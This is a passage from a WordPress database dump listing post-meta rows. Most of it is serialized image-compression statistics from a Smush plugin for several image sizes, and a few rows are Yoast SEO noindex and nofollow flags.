5;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.3300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:4277;s:11:\"size_before\";i:32079;s:10:\"size_after\";i:27802;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.29000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:363;s:11:\"size_before\";i:4978;s:10:\"size_after\";i:4615;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:952;s:11:\"size_before\";i:10767;s:10:\"size_after\";i:9815;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1875;s:11:\"size_before\";i:16024;s:10:\"size_after\";i:14149;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4498,78,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:16.44471574753818998715360066853463649749755859375;s:5:\"bytes\";i:10237;s:11:\"size_before\";i:62251;s:10:\"size_after\";i:52014;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:314;s:11:\"size_before\";i:2926;s:10:\"size_after\";i:2612;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:929;s:11:\"size_before\";i:6368;s:10:\"size_after\";i:5439;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.25;s:5:\"bytes\";i:5219;s:11:\"size_before\";i:22444;s:10:\"size_after\";i:17225;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:485;s:11:\"size_before\";i:5613;s:10:\"size_after\";i:5128;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1196;s:11:\"size_before\";i:10161;s:10:\"size_after\";i:8965;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:2094;s:11:\"size_before\";i:14739;s:10:\"size_after\";i:12645;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4499,77,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.4285372879010846958180991350673139095306396484375;s:5:\"bytes\";i:8291;s:11:\"size_before\";i:79503;s:10:\"size_after\";i:71212;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:278;s:11:\"size_before\";i:3887;s:10:\"size_after\";i:3609;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.1199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:740;s:11:\"size_before\";i:9111;s:10:\"size_after\";i:8371;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:4174;s:11:\"size_before\";i:33183;s:10:\"size_after\";i:29009;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.70999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:344;s:11:\"size_before\";i:5126;s:10:\"size_after\";i:4782;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:895;s:11:\"size_before\";i:11295;s:10:\"size_after\";i:10400;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1860;s:11:\"size_before\";i:16901;s:10:\"size_after\";i:15041;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4500,75,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:16.731375879640864923203480429947376251220703125;s:5:\"bytes\";i:9653;s:11:\"size_before\";i:57694;s:10:\"size_after\";i:48041;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.4399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:262;s:11:\"size_before\";i:2509;s:10:\"size_after\";i:2247;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.550000000000000710542735760100185871124267578125;s:5:\"bytes\";i:831;s:11:\"size_before\";i:5712;s:10:\"size_after\";i:4881;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:5152;s:11:\"size_before\";i:21532;s:10:\"size_after\";i:16380;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:366;s:11:\"size_before\";i:4865;s:10:\"size_after\";i:4499;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1079;s:11:\"size_before\";i:9265;s:10:\"size_after\";i:8186;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:1963;s:11:\"size_before\";i:13811;s:10:\"size_after\";i:11848;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4501,74,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.438223511195221959724221960641443729400634765625;s:5:\"bytes\";i:8494;s:11:\"size_before\";i:81374;s:10:\"size_after\";i:72880;s:4:\"time\";d:1.520000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:239;s:11:\"size_before\";i:3726;s:10:\"size_after\";i:3487;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:696;s:11:\"size_before\";i:8874;s:10:\"size_after\";i:8178;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:4399;s:11:\"size_before\";i:34318;s:10:\"size_after\";i:29919;s:4:\"time\";d:1.45999999999999996447286321199499070644378662109375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.79999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:346;s:11:\"size_before\";i:5087;s:10:\"size_after\";i:4741;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:905;s:11:\"size_before\";i:11560;s:10:\"size_after\";i:10655;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.7200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:1909;s:11:\"size_before\";i:17809;s:10:\"size_after\";i:15900;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4502,1411,'_yoast_wpseo_meta-robots-nofollow','1'),(4503,1411,'_yoast_wpseo_meta-robots-noindex','1'),(4504,1323,'_yoast_wpseo_meta-robots-noindex','1'),(4505,1324,'_yoast_wpseo_meta-robots-noindex','1'),(4506,1325,'_yoast_wpseo_meta-robots-noindex','1'),(4507,1328,'_yoast_wpseo_meta-robots-noindex','1'),(4508,1329,'_yoast_wpseo_meta-robots-noindex','1'),(4509,1333,'_yoast_wpseo_meta-robots-noindex','1'),(4510,1335,'_yoast_wpseo_meta-robots-noindex','1'),(4511,1349,'_yoast_wpseo_meta-robots-noindex','1'),(4512,1341,'_yoast_wpseo_meta-robots-noindex','1'),(4513,1342,'_yoast_wpseo_meta-robots-noindex','1'),(4514,1344,'_yoast_wpseo_meta-robots-noindex','1'),(4515,1345,'_yoast_wpseo_meta-robots-noindex','1'),(4516,1348,'_yoast_wpseo_meta-robots-nofollow','1'),(4517,1353,'_yoast_wpseo_meta-robots-noindex','1'),(4518,2035,'_yoast_wpseo_meta-robots-noindex','1'),(4519,1944,'_yoast_wpseo_meta-robots-noindex','1'),(4520,1357,'_yoast_wpseo_meta-robots-noindex','1'),(4521,1361,'_yoast_wpseo_meta-robots-noindex','1'),(4522,1363,'_yoast_wpseo_meta-robots-noindex','1'),(4523,1366,'_yoast_wpseo_meta-robots-noindex','1'),(4524,72,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.824044760368753514967465889640152454376220703125;s:5:\"bytes\";i:9454;s:11:\"size_before\";i:50223;s:10:\"size_after\";i:40769;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.3699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:279;s:11:\"size_before\";i:2255;s:10:\"size_after\";i:1976;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.5;s:5:\"bytes\";i:830;s:11:\"size_before\";i:5030;s:10:\"size_after\";i:4200;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.440000000000001278976924368180334568023681640625;s:5:\"bytes\";i:5010;s:11:\"size_before\";i:18951;s:10:\"size_after\";i:13941;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:388;s:11:\"size_before\";i:4243;s:10:\"size_after\";i:3855;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.25;s:5:\"bytes\";i:1060;s:11:\"size_before\";i:8003;s:10:\"size_after\";i:6943;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1887;s:11:\"size_before\";i:11741;s:10:\"size_after\";i:9854;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4525,71,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.4937193174944791707048352691344916820526123046875;s:5:\"bytes\";i:8171;s:11:\"size_before\";i:71091;s:10:\"size_after\";i:62920;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:239;s:11:\"size_before\";i:3407;s:10:\"size_after\";i:3168;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:666;s:11:\"size_before\";i:7984;s:10:\"size_after\";i:7318;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.8699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:4242;s:11:\"size_before\";i:30582;s:10:\"size_after\";i:26340;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.19000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:320;s:11:\"size_before\";i:4451;s:10:\"size_after\";i:4131;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:903;s:11:\"size_before\";i:9821;s:10:\"size_after\";i:8918;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.1300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1801;s:11:\"size_before\";i:14846;s:10:\"size_after\";i:13045;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4526,69,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:16.34910878918254439895463292486965656280517578125;s:5:\"bytes\";i:11438;s:11:\"size_before\";i:69961;s:10:\"size_after\";i:58523;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.5600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:360;s:11:\"size_before\";i:2655;s:10:\"size_after\";i:2295;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:993;s:11:\"size_before\";i:6467;s:10:\"size_after\";i:5474;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:5683;s:11:\"size_before\";i:26191;s:10:\"size_after\";i:20508;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.5299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:543;s:11:\"size_before\";i:5699;s:10:\"size_after\";i:5156;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:1437;s:11:\"size_before\";i:11460;s:10:\"size_after\";i:10023;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:2422;s:11:\"size_before\";i:17489;s:10:\"size_after\";i:15067;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4527,68,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.67390886368006164275357150472700595855712890625;s:5:\"bytes\";i:11103;s:11:\"size_before\";i:104020;s:10:\"size_after\";i:92917;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:327;s:11:\"size_before\";i:4091;s:10:\"size_after\";i:3764;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:899;s:11:\"size_before\";i:10584;s:10:\"size_after\";i:9685;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.25;s:5:\"bytes\";i:5228;s:11:\"size_before\";i:42694;s:10:\"size_after\";i:37466;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.5600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:604;s:11:\"size_before\";i:7058;s:10:\"size_after\";i:6454;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:1427;s:11:\"size_before\";i:15652;s:10:\"size_after\";i:14225;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.9399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:2618;s:11:\"size_before\";i:23941;s:10:\"size_after\";i:21323;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4528,62,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.2279224983812326854604179970920085906982421875;s:5:\"bytes\";i:7365;s:11:\"size_before\";i:60231;s:10:\"size_after\";i:52866;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.2200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:226;s:11:\"size_before\";i:2748;s:10:\"size_after\";i:2522;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.6099999999999994315658113919198513031005859375;s:5:\"bytes\";i:612;s:11:\"size_before\";i:6367;s:10:\"size_after\";i:5755;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:3944;s:11:\"size_before\";i:25639;s:10:\"size_after\";i:21695;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.87999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:301;s:11:\"size_before\";i:3821;s:10:\"size_after\";i:3520;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.0800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:778;s:11:\"size_before\";i:8564;s:10:\"size_after\";i:7786;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:1504;s:11:\"size_before\";i:13092;s:10:\"size_after\";i:11588;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4529,61,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.25068053467679618506736005656421184539794921875;s:5:\"bytes\";i:7569;s:11:\"size_before\";i:73839;s:10:\"size_after\";i:66270;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:256;s:11:\"size_before\";i:3236;s:10:\"size_after\";i:2980;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:671;s:11:\"size_before\";i:7676;s:10:\"size_after\";i:7005;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.0299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:3967;s:11:\"size_before\";i:30456;s:10:\"size_after\";i:26489;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:368;s:11:\"size_before\";i:4855;s:10:\"size_after\";i:4487;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:843;s:11:\"size_before\";i:11013;s:10:\"size_after\";i:10170;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1464;s:11:\"size_before\";i:16603;s:10:\"size_after\";i:15139;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4530,58,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.8145623495099538757813206757418811321258544921875;s:5:\"bytes\";i:8147;s:11:\"size_before\";i:58974;s:10:\"size_after\";i:50827;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:266;s:11:\"size_before\";i:2680;s:10:\"size_after\";i:2414;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.1899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:699;s:11:\"size_before\";i:6245;s:10:\"size_after\";i:5546;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:4231;s:11:\"size_before\";i:25131;s:10:\"size_after\";i:20900;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:367;s:11:\"size_before\";i:3742;s:10:\"size_after\";i:3375;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.0299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:921;s:11:\"size_before\";i:8350;s:10:\"size_after\";i:7429;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.9700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:1663;s:11:\"size_before\";i:12826;s:10:\"size_after\";i:11163;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4531,57,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.14257679056853334031984559260308742523193359375;s:5:\"bytes\";i:8353;s:11:\"size_before\";i:68791;s:10:\"size_after\";i:60438;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:299;s:11:\"size_before\";i:3034;s:10:\"size_after\";i:2735;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.5;s:5:\"bytes\";i:749;s:11:\"size_before\";i:7130;s:10:\"size_after\";i:6381;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:4293;s:11:\"size_before\";i:28749;s:10:\"size_after\";i:24456;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:393;s:11:\"size_before\";i:4413;s:10:\"size_after\";i:4020;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:952;s:11:\"size_before\";i:10125;s:10:\"size_after\";i:9173;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.8699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:1667;s:11:\"size_before\";i:15340;s:10:\"size_after\";i:13673;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4532,55,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.9818729333963158723008746164850890636444091796875;s:5:\"bytes\";i:8117;s:11:\"size_before\";i:67744;s:10:\"size_after\";i:59627;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.4399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:299;s:11:\"size_before\";i:2865;s:10:\"size_after\";i:2566;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.6899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:752;s:11:\"size_before\";i:7036;s:10:\"size_after\";i:6284;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:4115;s:11:\"size_before\";i:28773;s:10:\"size_after\";i:24658;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:379;s:11:\"size_before\";i:4232;s:10:\"size_after\";i:3853;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:948;s:11:\"size_before\";i:9838;s:10:\"size_after\"